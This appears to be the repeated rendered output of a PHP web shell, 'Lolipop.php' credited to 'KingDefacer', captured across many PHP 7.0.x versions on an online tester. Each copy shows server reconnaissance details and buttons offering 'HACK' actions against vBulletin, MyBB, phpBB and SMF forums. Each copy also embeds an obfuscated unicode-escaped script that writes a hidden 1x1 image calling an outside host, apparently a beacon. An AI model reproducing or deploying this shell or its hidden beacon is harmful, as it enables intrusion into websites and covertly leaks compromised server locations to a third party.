cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.0.26
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.0.26</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.0.25
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.0.25</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.0.24
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.0.24</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.0.23
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.0.23</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.0.22
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.0.22</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.0.21
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.0.21</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.0.20
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.0.20</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.0.19
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.0.19</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.0.18
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.0.18</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.0.17
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.0.17</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.0.16
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.0.16</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.0.15
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.0.15</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> 